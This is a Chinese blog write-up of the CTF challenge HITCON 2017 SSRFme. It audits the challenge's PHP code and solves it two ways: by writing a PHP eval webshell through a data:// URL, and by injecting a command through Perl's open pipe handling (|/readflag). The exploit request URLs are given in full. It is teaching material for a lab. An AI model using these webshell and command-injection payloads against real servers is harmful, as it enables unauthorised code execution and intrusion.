[HITCON 2017]SSRFme1

最新推荐文章于 2024-07-27 14:51:42 发布
最新推荐文章于 2024-07-27 14:51:42 发布
阅读量941 收藏 16
点赞数 16
文章标签: 网络 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwtj/article/details/139884134
版权

知识点:

        1. php代码审计

        2. SSRF&伪协议

        3. perl语言漏洞

PHP代码审计

 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

进入页面开始代码审计~

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {  
    $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);  
    $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];  
}

这段代码首先检查$_SERVER['HTTP_X_FORWARDED_FOR']是否存在,如果存在,则认为这是一个代理IP。然后,它使用explode函数将代理IP字符串(可能是由多个IP组成的,由逗号分隔)分割成数组,并取第一个IP作为$_SERVER['REMOTE_ADDR']的值。这通常用于在反向代理环境中获取原始客户端的IP地址.

echo $_SERVER["REMOTE_ADDR"];

输出客户端的ip地址.

$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);  
@mkdir($sandbox);  
@chdir($sandbox);

 这里首先根据客户端的IP地址(已经过MD5哈希处理,并附加了"orange"字符串)创建一个沙盒目录名称。然后,使用@mkdir(@用于抑制错误消息)尝试创建这个目录。如果目录成功创建,使用@chdir切换到这个目录.

$data = shell_exec("GET " . escapeshellarg($_GET["url"]));

将执行shell_exec里面的内容(用GET方法去请求url),并赋值给$data.

$info = pathinfo($_GET["filename"]);  
$dir  = str_replace(".", "", basename($info["dirname"]));  
@mkdir($dir);  
@chdir($dir);  
@file_put_contents(basename($info["basename"]), $data);

首先,通过pathinfo函数解析$_GET["filename"],获取其中的目录名和文件名.然后,它尝试创建一个新的目录(基于目录名,但移除了所有点.),并切换到该目录。最后,使用file_put_contents函数将数据保存到文件中,文件名基于$_GET["filename"]中的基本文件名.

大概总结一下就是你要传入一个url参数和一个filename参数,url参数会被执行get请求,得到后的内容会被写入到 sandbox/md5(orange.ip)/filename 目录下.

所以我么可以将url的内容定义为 / , 之后filename就叫love吧~

http://9e8fa588-61bd-463f-982d-75d20626a6a1.node5.buuoj.cn:81/?filename=love&url=/

开始执行.

结果为.

 

可以清晰的看到根目录下存在一个flag的文件,但是我们GET请求只能读取目录不能读取文件内容 😅.

方法一,SSRF&伪协议

我们可以去构造一个webshell去读取flag,可以使用data伪协议来构建.

url=data://text/plain,<?php @eval($_POST[cmd]); ?>,那么filename就叫love.php吧~

http://9e8fa588-61bd-463f-982d-75d20626a6a1.node5.buuoj.cn:81/?filename=love.php&url=data://text/plain,<?php @eval($_POST[cmd]); ?>

执行成功后连接一下~

 

去访问一下 /flag 发现什么都没有 😅 .

不过有一个叫readflag的文件.

 

去执行一下~

 

得到了flag,我又试了试cat flag ,结果告诉我没有权限,只有root账户才能读~ 

方法二,perl语言漏洞

因为GET函数在底层调用了perl语言中的open函数,但是该函数存在rce漏洞。当open函数要打开的文件名中存在管道符(并且系统中存在该文件名),就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行.

首先我们先创建一个同名文件~
 

http://131cc1e9-3c92-4b0c-ac15-4bc71fff7f9d.node5.buuoj.cn:81/?url=&filename=|/readflag

之后去执行命令~

http://131cc1e9-3c92-4b0c-ac15-4bc71fff7f9d.node5.buuoj.cn:81/?url=file:|/readflag&filename=123

最后访问我们写入了执行结果的文件~

http://131cc1e9-3c92-4b0c-ac15-4bc71fff7f9d.node5.buuoj.cn:81/sandbox/e51a046f7f8d8c6a6ff47114cd2cd296/123

 出现flag,游戏结束~ 

 

 

 

 

 

alwtj
关注
  • 16
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Training-Writeup:https的简要说明
04-29
实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / ...
[HITCON 2017]SSRFme
wwwyyyxxxx的博客
03-09 401
x-forwarded-for值可以在请求头伪造一个任意值便于访问上传的文件,filename值用于指定写入的文件名,url用于拼接shell_exec的字符串参数,然后将shell_exec的结果写入filename指定的文件。shell_exec()拼接的GET参数表示执行一个GET请求,在本地试了一下可以用伪协议,也可以直接任意文件读取,不支持php协议,但是连上之后不能直接读取flag和readflag,也不能直接执行readflag。这里既然是将内容写入指定的文件,并且文件名没有任何过滤。
BUUCTF [HITCON 2017]SSRFme 1
weixin_46245411的博客
07-14 2116
文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 说明 题目直接给出了源码,原本以为会很简单,没想到涉及了一大堆的linux命令行的命令执行,看了别人大佬的WP后感动鸭梨山大,但是认真复现后发现受益良多~ 一、代码审计(这里为了不泄露个人信息,就假设了一个IP地址吧) 原本还以为是很简单的XFF漏洞利用,没想到啊~ 127.0.0.1<?php if (isset($_SERVER['HTTP_X_FORW...
[HITCON 2017]SSRFme代码审计
BoJing6的博客
04-11 383
认认真真做了一次代码审计的题目,感觉收获很大,决定记录下来一打开题目就是源代码首先isset()是 PHP 中的一个函数,用于检查变量是否已经被设置并且不是 null。它接受一个或多个参数,并返回一个布尔值,指示每个参数是否被设置。//输出ip地址,在网页上也能看到总之前面这一串的目的就是输出ip地址题目会将orange和ip地址进行拼接,然后md5加密然后使用mkdir()创建了这样的一个沙盒路径,并且使用chdir()进入该目录。
[BUUCTF][HITCON 2017]SSRFme
Y4tacker的博客
10-03 6052
文章目录知识点新学会的函数代码审计 知识点 perl脚本GET open命令漏洞 GET是Lib for WWW in Perl中的命令 目的是模拟http的GET请求,GET函数底层就是调用了open处理 open存在命令执行,并且还支持file函数 新学会的函数 pathinfo 代码审计 前面的代码返回了我的ip,和orange一起进行md5加密。通过url参数输入的内容会以GET命令执行, 命令执行的结果会被存入我们以filename参数的值命名的文件里 <?php if (isset
BUUCTF之[HITCON 2017]SSRFme详解
m0_62107966的博客
09-09 742
BUUCTF之[HITCON 2017]SSRFme详解 $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox , 给了沙盒目录, $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//题目提供了沙盒目录,目录名就是sandbox ,md5是将(orangeip地址)这个整体进行加密。,注意中间不能有空格!
buuctf [HITCON 2017]SSRFme
qq_52671379的博客
04-19 526
buuctf [HITCON 2017]SSRFme
HITCON-Badge:HITCON徽章相关文件
04-29
(非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的硬盘。 用作...
台灣駭客年會 HITCON CMT 2017 - 安全技术资料汇总(共3份).zip
02-06
Breaking_into_the_iCloud_Keychain.pdf CSCS_以技術力協助公民社會的初次嘗試.pdf 臺灣資安人才教育_Cybersecurity_Education_in_Taiwan.pdf
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的...
MarkTool之TCP服务端
Qt学视觉
07-24 400
MarkTool之TCP服务端
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 218
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
S5730举例
最新发布
jjjxxxhhh123的博客
07-27 602
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络带宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
网络编程套接字socket
安权_code的博客
07-23 941
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
DNS域名管理系统、搭建DNS服务
十四的博客
07-23 920
DNS概述。
使用WebSocket协议调用群发方法将消息返回客户端页面
2302_79840586的博客
07-27 813
使用WebSocket协议调用群发方法将消息返回客户端页面
H3C与VPN高级应用(七)深入探讨H3C防火墙与VPN高级应用
洛秋的博客
07-23 1101
IPSec(Internet Protocol Security)是一种用于保护IP通信的协议,通过对数据包进行加密和认证来确保数据的机密性、完整性和真实性。IPSec VPN通常用于建立安全的远程连接,保护企业内部网络与远程办公或分支机构之间的数据通信。NAT(Network Address Translation)是一种将私有IP地址转换为公共IP地址的技术,通常用于多个设备共享一个公共IP地址访问互联网。NAT有助于节约公共IP地址,同时增强内部网络的安全性。
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值